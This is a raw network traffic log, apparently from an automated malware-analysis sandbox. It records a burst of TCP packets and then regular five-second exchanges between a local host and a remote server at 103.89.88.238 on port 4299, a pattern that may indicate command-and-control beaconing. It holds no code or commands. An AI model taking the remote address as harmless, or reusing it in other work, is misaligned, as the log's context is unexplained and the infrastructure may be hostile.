                                                                              Feb 23, 2021 07:36:07.000020981 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000036955 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000052929 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000055075 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000067949 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000085115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000086069 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000101089 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000108957 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000117064 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000135899 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000140905 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000154018 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000169992 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000173092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000185966 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000201941 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000216007 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000221014 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000232935 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000247955 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000255108 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000267029 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000279903 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000283957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000299931 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000303984 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000315905 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000330925 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000332117 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000346899 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000361919 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000377893 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000384092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000396967 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000413895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000415087 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000428915 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000437975 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000446081 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000461102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000468969 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000475883 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000492096 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000499964 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000508070 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000528097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000545025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000559092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000560999 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000576019 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000592947 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000593901 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000610113 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000612974 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000624895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000634909 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000664949 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238056898 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238087893 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238101006 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238117933 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238130093 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238142014 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238153934 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238171101 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238188028 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238207102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238225937 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238225937 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238240957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238257885 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238274097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238289118 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238305092 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238320112 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238339901 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238339901 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238357067 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238373041 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238389015 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238404989 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238421917 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238424063 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238437891 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238454103 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238472939 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238491058 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238503933 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238507032 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238527060 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238547087 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238563061 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238569975 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238579035 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238595009 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238667011 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.240519047 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240546942 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240564108 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240576029 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240595102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240616083 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240633011 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240636110 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.240649939 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240662098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240679026 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240695000 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240710974 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240715981 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.240731001 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240750074 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240770102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.240798950 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.240856886 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474251986 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474287987 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474301100 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474318981 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474338055 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474350929 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474364042 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474380016 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474396944 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474397898 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474409103 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474421978 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474440098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474461079 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474473953 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474474907 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474488974 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474507093 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474520922 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474533081 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474545002 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474548101 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474558115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474570990 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474594116 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474595070 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474607944 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474622011 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474634886 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474639893 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474647999 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474659920 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474673033 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474689960 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474703074 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474720001 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474731922 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474745035 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474757910 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474772930 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474782944 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474800110 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474817991 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474829912 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474834919 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474850893 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474868059 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474884033 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474889040 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474904060 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474922895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474939108 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474947929 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.474956989 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474972010 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.474983931 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475001097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475012064 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.475018024 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475034952 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475053072 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475063086 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.475069046 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475085020 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475101948 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475120068 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.475121021 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.475153923 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.476933002 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.476958036 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.476986885 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.476985931 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477003098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477020025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477035046 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477037907 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477051973 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477068901 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477088928 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477089882 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477107048 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477123976 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477140903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477149963 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477155924 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477173090 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477190018 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477193117 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477206945 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477226019 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477231979 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477245092 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477261066 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477277994 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477281094 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477293968 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477309942 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477325916 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477341890 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477351904 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477361917 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477380991 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477399111 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477421999 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477432966 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.477438927 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.477482080 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.513545036 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.711816072 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711841106 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711858988 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711874008 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711889982 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711903095 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.711906910 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711921930 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711925030 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.711939096 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711955070 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711972952 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.711975098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.711992025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712008953 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712022066 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712024927 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712042093 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712049961 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712058067 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712074041 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712080002 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712090969 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712110996 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712127924 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712135077 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712145090 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712162018 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712172985 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712177992 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712193966 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712204933 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712210894 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712227106 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712233067 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712246895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712265015 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712265968 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712280989 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712286949 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712297916 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712315083 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712325096 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712331057 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712349892 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712361097 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712366104 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712384939 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712388992 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712404013 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712419033 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712435007 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712439060 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712451935 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712467909 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712476015 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712485075 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712501049 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712503910 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712522030 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712526083 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712539911 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712555885 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712563038 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712572098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712589025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712605000 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712610006 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712620974 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712632895 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712636948 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712656021 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712673903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712686062 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712690115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712706089 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712722063 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.712727070 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712749958 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.712774992 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:10.030739069 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:10.033634901 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:10.236829996 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:10.237117052 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:10.306283951 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:10.483119965 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:10.484463930 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:10.485033989 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:15.043122053 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:15.047502995 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:15.323378086 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:20.050517082 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:20.052700996 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:20.331136942 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:25.051877022 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:25.055032969 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:25.332536936 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:30.053472042 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:30.057986021 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:30.365895033 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:35.055890083 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:35.096524000 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:35.383939981 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:40.057007074 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:40.059710026 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:40.338299036 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:45.059053898 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:45.060870886 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:45.355911970 CET429949726103.89.88.238192.168.2.4
